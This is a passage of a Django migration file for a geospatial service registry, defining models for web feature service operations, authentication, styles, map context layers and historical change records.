('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('method', models.CharField(choices=[(None, '---'), ('Get', 'Get'), ('Post', 'Post')], help_text='the http method you can perform for this url', max_length=10, verbose_name='http method')),
('url', models.URLField(editable=False, help_text='the url for this operation', max_length=4096, verbose_name='url')),
('operation', models.CharField(choices=[(None, '---'), ('GetCapabilities', 'GetCapabilities'), ('GetMap', 'GetMap'), ('GetFeatureInfo', 'GetFeatureInfo'), ('DescribeLayer', 'DescribeLayer'), ('GetLegendGraphic', 'GetLegendGraphic'), ('GetStyles', 'GetStyles'), ('PutStyles', 'PutStyles'), ('GetFeature', 'GetFeature'), ('Transaction', 'Transaction'), ('LockFeature', 'LockFeature'), ('DescribeFeatureType', 'DescribeFeatureType'), ('GetFeatureWithLock', 'GetFeatureWithLock'), ('GetGmlObject', 'GetGmlObject'), ('ListStoredQueries', 'ListStoredQueries'), ('GetPropertyValue', 'GetPropertyValue'), ('DescribeStoredQueries', 'DescribeStoredQueries'), ('GetRecords', 'GetRecords'), ('DescribeRecord', 'DescribeRecord'), ('GetRecordById', 'GetRecordById')], editable=False, help_text='the operation you can perform with this url.', max_length=30, verbose_name='operation')),
('mime_types', models.ManyToManyField(blank=True, editable=False, help_text='all available mime types of the remote url', related_name='webfeatureserviceoperationurl_operation_urls', related_query_name='webfeatureserviceoperationurl_operation_url', to='registry.MimeType', verbose_name='internet mime type')),
('service', models.ForeignKey(editable=False, help_text='the web feature service for that this url can be used for.', on_delete=django.db.models.deletion.CASCADE, related_name='operation_urls', related_query_name='operation_url', to='registry.webfeatureservice', verbose_name='related web feature service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='WebFeatureServiceAuthentication',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(help_text='the username used for the authentication.', max_length=255, verbose_name='username')),
('password', models.CharField(help_text='the password used for the authentication.', max_length=500, verbose_name='password')),
('auth_type', models.CharField(choices=[(None, '---'), ('http_basic', 'http_basic'), ('http_digest', 'http_digest')], help_text='kind of authentication mechanism shall used.', max_length=100, verbose_name='authentication type')),
('key_file', models.FileField(editable=False, max_length=1024, upload_to=registry.models.security.key_file_path)),
('service', models.OneToOneField(blank=True, help_text='the optional authentication type and credentials to request the service.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='auth', related_query_name='auth', to='registry.webfeatureservice', verbose_name='web feature service')),
],
options={
'abstract': False,
},
),
migrations.CreateModel(
name='TimeExtent',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('start', models.DateTimeField()),
('stop', models.DateTimeField()),
('resolution', models.DurationField(null=True)),
('dimension', models.ForeignKey(help_text='the related dimension where this interval was found.', on_delete=django.db.models.deletion.CASCADE, related_name='time_extents', related_query_name='time_extent', to='registry.dimension', verbose_name='related dimension')),
],
),
migrations.CreateModel(
name='Style',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(editable=False, help_text="The style's Name is used in the Map request STYLES parameter to lookup the style on server side.", max_length=255, verbose_name='name')),
('title', models.CharField(editable=False, help_text='The Title is a human-readable string as an alternative for the name attribute.', max_length=255, verbose_name='title')),
('layer', models.ForeignKey(editable=False, help_text='the layer for that this style is for.', on_delete=django.db.models.deletion.CASCADE, related_name='styles', related_query_name='style', to='registry.layer', verbose_name='related layer')),
],
),
migrations.CreateModel(
name='RuleSet',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=1000)),
('rules', models.ManyToManyField(related_name='rule_set', to='registry.Rule')),
],
),
migrations.CreateModel(
name='HistoricalCatalougeService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical catalouge service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalFeatureType',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('describe_feature_type_document', models.TextField(help_text='the fetched content of the download describe feature type document.', null=True, verbose_name='describe feature type')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical feature type',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalLayer',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('preview_image', models.TextField(blank=True, max_length=100, null=True)),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('identifier', models.CharField(editable=False, help_text='this is a string which identifies the element on the remote service.', max_length=500, null=True, verbose_name='identifier')),
('bbox_lat_lon', django.contrib.gis.db.models.fields.PolygonField(blank=True, editable=False, help_text='bounding box shall be supplied regardless of what CRS the map server may support, but it may be approximate if the data are not natively in geographic coordinates. The purpose of bounding box is to facilitate geographic searches without requiring coordinate transformations by the search engine.', null=True, srid=4326, verbose_name='bounding box')),
('is_queryable', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer provides factual information or not. Parsed from capabilities.', verbose_name='is queryable')),
('is_opaque', models.BooleanField(default=False, editable=False, help_text='flag to signal if this layer support transparency content or not. Parsed from capabilities.', verbose_name='is opaque')),
('is_cascaded', models.BooleanField(default=False, editable=False, help_text='WMS cascading allows to expose layers coming from other WMS servers as if they were local layers', verbose_name='is cascaded')),
('scale_min', models.FloatField(blank=True, editable=False, help_text='minimum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale minimum value')),
('scale_max', models.FloatField(blank=True, editable=False, help_text='maximum scale for a possible request to this layer. If the request is out of the given scope, the service will response with empty transparentimages. None value means no restriction.', null=True, verbose_name='scale maximum value')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical layer',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalWebFeatureService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical web feature service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.CreateModel(
name='HistoricalWebMapService',
fields=[
('xml_backup_file', models.TextField(editable=False, help_text='the original xml as backup to restore the xml field.', max_length=100, verbose_name='xml backup')),
('access_constraints', models.TextField(blank=True, help_text='access constraints for the given resource.', null=True, verbose_name='access constraints')),
('fees', models.TextField(blank=True, help_text='Costs and of terms of use for the given resource.', null=True, verbose_name='fees')),
('use_limitation', models.TextField(blank=True, null=True)),
('license_source_note', models.TextField(blank=True, null=True)),
('id', models.UUIDField(db_index=True, default=uuid.uuid4, editable=False)),
('date_stamp', models.DateTimeField(blank=True, db_index=True, editable=False, help_text='date that the metadata was created. If this is a metadata record which is parsed from remote iso metadata, the date stamp of the remote iso metadata will be used.', verbose_name='date stamp')),
('file_identifier', models.CharField(db_index=True, default=uuid.uuid4, editable=False, help_text='the parsed file identifier from the iso metadata xml (gmd:fileIdentifier) OR for example if it is a layer/featuretypethe uuid of the described layer/featuretype shall be used to identify the generated iso metadata xml.', max_length=1000, null=True, verbose_name='file identifier')),
('origin', models.CharField(choices=[(None, '---'), ('capabilities', 'capabilities'), ('iso metadata', 'iso metadata')], editable=False, help_text='Where the metadata record comes from.', max_length=20, verbose_name='origin')),
('origin_url', models.URLField(blank=True, editable=False, help_text='the url of the document where the information of this metadata record comes from', max_length=4096, null=True, verbose_name='origin url')),
('title', models.CharField(help_text='a short descriptive title for this metadata', max_length=1000, verbose_name='title')),
('abstract', models.TextField(help_text='brief summary of the content of this metadata.', null=True, verbose_name='abstract')),
('is_broken', models.BooleanField(default=False, editable=False, help_text='TODO', verbose_name='is broken')),
('is_customized', models.BooleanField(default=False, editable=False, help_text='If the metadata record is customized, this flag is True', verbose_name='is customized')),
('insufficient_quality', models.TextField(blank=True, help_text='TODO', null=True)),
('is_searchable', models.BooleanField(default=False, help_text='only searchable metadata will be returned from the search api', verbose_name='is searchable')),
('hits', models.IntegerField(default=0, editable=False, help_text='how many times this metadata was requested by a client', verbose_name='hits')),
('is_active', models.BooleanField(default=False, help_text='Used to activate/deactivate the service. If it is deactivated, you cant request the service through the Mr. Map proxy.', verbose_name='is active?')),
('version', models.CharField(choices=[(None, '---'), ('1.0.0', '1.0.0'), ('1.1.0', '1.1.0'), ('1.1.1', '1.1.1'), ('1.3.0', '1.3.0'), ('2.0.0', '2.0.0'), ('2.0.2', '2.0.2')], editable=False, help_text='the version of the service type as sem version', max_length=10, verbose_name='version')),
('service_url', models.URLField(editable=False, help_text='the base url of the service', max_length=4096, verbose_name='url')),
('get_capabilities_url', models.URLField(help_text='the capabilities url of the ogc service', max_length=4096, validators=[MrMap.validators.validate_get_capablities_uri], verbose_name='get capabilities url')),
('history_id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
],
options={
'verbose_name': 'historical web map service',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
bases=(simple_history.models.HistoricalChanges, models.Model),
),
migrations.AddConstraint(
model_name='referencesystem',
constraint=models.UniqueConstraint(fields=('code', 'prefix'), name='registry_referencesystem_unique_code_prefix'),
),
migrations.AddField(
model_name='proxysetting',
name='wfs',
field=models.OneToOneField(help_text='the security proxy settings for this service.', on_delete=django.db.models.deletion.CASCADE, related_name='web_feature_service', related_query_name='web_feature_service', to='registry.webfeatureservice', verbose_name='proxy settings'),
),
migrations.AddField(
model_name='proxysetting',
name='wms',
field=models.OneToOneField(help_text='the security proxy settings for this service.', on_delete=django.db.models.deletion.CASCADE, related_name='web_map_service', related_query_name='web_map_service', to='registry.webmapservice', verbose_name='proxy settings'),
),
migrations.AddConstraint(
model_name='metadatacontact',
constraint=models.UniqueConstraint(fields=('name', 'person_name', 'email', 'phone', 'facsimile', 'city', 'postal_code', 'address_type', 'address', 'state_or_province', 'country'), name='registry_metadatacontact_unique_together_metadata_contact'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='dataset_metadata',
field=models.ForeignKey(blank=True, help_text='You can use this field to pre filter possible Layer selection.', null=True, on_delete=django.db.models.deletion.PROTECT, to='registry.datasetmetadata', verbose_name='Dataset Metadata'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='layer_style',
field=models.ForeignKey(blank=True, help_text='Select a style for rendering.', null=True, on_delete=django.db.models.deletion.PROTECT, to='registry.style', verbose_name='Style'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='map_context',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='map_context_layers', related_query_name='map_context_layer', to='registry.mapcontext'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='child_layers', to='registry.mapcontextlayer'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='rendering_layer',
field=models.ForeignKey(blank=True, help_text='Select a layer for rendering.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='mapcontextlayers_rendering', to='registry.layer', verbose_name='Rendering layer'),
),
migrations.AddField(
model_name='mapcontextlayer',
name='selection_layer',
field=models.ForeignKey(blank=True, help_text='Select a layer for feature selection.', null=True, on_delete=django.db.models.deletion.PROTECT, related_name='mapcontextlayers_selection', to='registry.layer', verbose_name='Selection layer'),
),
migrations.AddField(
model_name='legendurl',
name='mime_type',
field=models.ForeignKey(editable=False, help_text='the mime type of the remote legend url', on_delete=django.db.models.deletion.RESTRICT, related_name='legend_urls', related_query_name='legend_url', to='registry.mimetype', verbose_name='internet mime type'),
),
migrations.AddField(
model_name='legendurl',
name='style',
field=models.OneToOneField(editable=False, help_text='the style entity which is linked to this legend url', on_delete=django.db.models.deletion.CASCADE, related_name='legend_url', related_query_name='legend_url', to='registry.style', verbose_name='related style'),
),
migrations.AddField(
model_name='layerconformitycheckrun',
name='config',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='registry.conformitycheckconfiguration'),
),
migrations.AddField(
model_name='layerconformitycheckrun',
name='layer',
field=models.ForeignKey(blank=True, help_text='the layer targeted by this check', null=True, on_delete=django.db.models.deletion.CASCADE, to='registry.layer', verbose_name='layer'),
),
migrations.AddField(
model_name='layer',
name='keywords',
field=models.ManyToManyField(help_text='all keywords which are related to the content of this metadata.', related_name='layer_metadata', related_query_name='layer_metadata', to='registry.Keyword', verbose_name='keywords'),
),
migrations.AddField(
model_name='layer',
name='parent',
field=mptt.fields.TreeForeignKey(editable=False, help_text='the ancestor of this layer.', null=True, on_delete=django.db.models.deletion.CASCADE, related_name='children', related_query_name='child', to='registry.layer', verbose_name='parent layer'),
),
migrations.AddField(
model_name='layer',
name='reference_systems',
field=models.ManyToManyField(blank=True, editable=False, help_text='all reference systems which this element supports', related_name='layer', related_query_name='layer', to='registry.ReferenceSystem', verbose_name='reference systems'),
),
migrations.AddField(
model_name='layer',
name='service',
field=models.ForeignKey(editable=False, help_text='the extras service where this element is part of', on_delete=django.db.models.deletion.CASCADE, related_name='layers', related_query_name='layer', to='registry.webmapservice', verbose_name='service'),
),
migrations.AddField(
model_name='httpresponselog',
name='request',
field=models.OneToOneField(on_delete=django.db.models.deletion.PROTECT, related_name='response', related_query_name='response', to='registry.httprequestlog'),
),
migrations.AddField(
model_name='httprequestlog',
name='user',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='httprequestlog',
name='wfs',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to='registry.webfeatureservice'),
),
migrations.AddField(
model_name='httprequestlog',
name='wms',
field=models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, related_name='http_request_logs', related_query_name='http_request_log', to='registry.webmapservice'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.webmapservice'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalwebmapservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.webfeatureservice'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalwebfeatureservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='historicallayer',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.layer'),
),
migrations.AddField(
model_name='historicallayer',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicallayer',
name='parent',
field=mptt.fields.TreeForeignKey(blank=True, db_constraint=False, editable=False, help_text='the ancestor of this layer.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='child', to='registry.layer', verbose_name='parent layer'),
),
migrations.AddField(
model_name='historicallayer',
name='service',
field=models.ForeignKey(blank=True, db_constraint=False, editable=False, help_text='the extras service where this element is part of', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='layer', to='registry.webmapservice', verbose_name='service'),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.featuretype'),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalfeaturetype',
name='service',
field=models.ForeignKey(blank=True, db_constraint=False, editable=False, help_text='the extras service where this element is part of', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', related_query_name='featuretype', to='registry.webfeatureservice', verbose_name='service'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='history_relation',
field=models.ForeignKey(db_constraint=False, on_delete=django.db.models.deletion.DO_NOTHING, related_name='change_logs', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='history_user',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='licence',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.licence'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='metadata_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the metadata information.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='metadata contact'),
),
migrations.AddField(
model_name='historicalcatalougeservice',
name='service_contact',
field=models.ForeignKey(blank=True, db_constraint=False, help_text='This is the contact for the service provider.', null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='registry.metadatacontact', verbose_name='service contact'),
),
migrations.AddField(
model_name='harvestresult',
name='service',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='harvest_results', related_query_name='harvest_result', to='registry.catalougeservice'),
),
migrations.AddField(
model_name='featuretypeelement',
name='feature_type',
field=models.ForeignKey(help_text='related feature type of this element', on_delete=django.db.models.deletion.CASCADE, related_name='elements', related_query_name='element', to='registry.featuretype', verbose_name='feature type'),
),
migrations.AddField(
model_name='featuretypeconformitycheckrun',
name='config',
